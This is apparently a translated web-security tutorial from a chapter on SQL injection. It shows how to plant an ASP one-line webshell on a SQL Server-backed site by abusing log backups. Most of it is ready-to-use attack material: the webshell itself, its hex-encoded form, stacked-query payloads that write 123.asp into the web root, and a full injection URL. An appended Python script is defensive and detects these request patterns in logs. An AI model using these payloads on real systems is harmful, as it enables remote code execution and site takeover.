[Original] Web Security, Chapter 4, SQL Injection Part 14: Getting a Webshell via SQL Server Backup
<%execute(request("a"))%>
Differential backups fail often and are unreliable, so writing the one-liner through a log backup is recommended instead.
Writing the one-liner via log backup
Check whether the test_tmp table already exists. It is normally only present when someone has tested the target before; under normal circumstances nothing needs to be deleted.
;IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;alter database mydb set RECOVERY FULL;
; drop table test_tmp;create table test_tmp (a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
Drop the table
;drop table test_tmp
Create the test_tmp table
;create table test_tmp (a image);
Back up the mydb database in full to the specified directory
;backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;
Write the one-liner
;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA)
;backup log mydb to disk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
;drop table test_tmp
Enter the following statement at the injection point
http://www.demo1.com/index.aspx?id=1;IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;create table test_tmp (a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
select * from art where id=1;IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;create table test_tmp (a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
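A defender-side check for the request pattern shown above, as an added example that is not the original author's code: it URL-decodes request lines and flags stacked BACKUP statements whose destination carries a script extension, plus hex literals that decode to server-side script tags. The log line format, the extension list and all function names are assumptions; the sample lines are constructed from the page's demo values.

```python
import re
from urllib.parse import unquote_plus

# Extensions a web server may hand to a script engine (assumed list; adjust per site).
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".ashx", ".php", ".jsp"}
BACKUP_RE = re.compile(
    r"backup\s+(log|database)\s+\S+\s+to\s+disk\s*=\s*'([^']+)'", re.IGNORECASE)
HEX_RE = re.compile(r"0x([0-9a-f]{8,})", re.IGNORECASE)
SCRIPT_MARKERS = ("<%", "<?php", "<script")

def decode_hex_literal(digits):
    """Decode a T-SQL binary literal; odd-length literals get a leading zero."""
    if len(digits) % 2:
        digits = "0" + digits
    return bytes.fromhex(digits).decode("latin-1")

def scan_request(line):
    """Return a list of (rule, detail) findings for one request line."""
    text = unquote_plus(line)
    findings = []
    for kind, path in BACKUP_RE.findall(text):
        # Any BACKUP statement arriving in an HTTP request is suspicious by itself.
        findings.append(("backup-in-request", f"{kind.lower()} -> {path}"))
        dot = path.rfind(".")
        if dot != -1 and path[dot:].lower() in SCRIPT_EXTS:
            findings.append(("backup-to-script-extension", path))
    for digits in HEX_RE.findall(text):
        decoded = decode_hex_literal(digits)
        if any(marker in decoded.lower() for marker in SCRIPT_MARKERS):
            findings.append(("script-in-hex-literal", decoded[:40]))
    return findings

# Constructed sample request lines (method, URL, status), built from the page's demo values.
SAMPLE_LOG = [
    "GET /index.aspx?id=1 200",
    "GET /index.aspx?id=1;backup%20log%20mydb%20to%20disk%3D%27C:/inetpub/wwwroot/www.demo1.com/asp.bak%27%20with%20init 200",
    "GET /index.aspx?id=1;insert+into+test_tmp+(a)+values+(0x3C25657865637574652872657175657374282261222929253EDA) 200",
    "GET /index.aspx?id=1;backup+log+mydb+to+disk+=+'C:/inetpub/wwwroot/www.demo1.com/123.asp' 200",
]

if __name__ == "__main__":
    for number, entry in enumerate(SAMPLE_LOG, 1):
        for rule, detail in scan_request(entry):
            print(f"line {number}: {rule}: {detail}")
```

The same two signals apply on the database side: a backup destination with a script extension, or one located under the web root, has no legitimate use.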
Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/131.html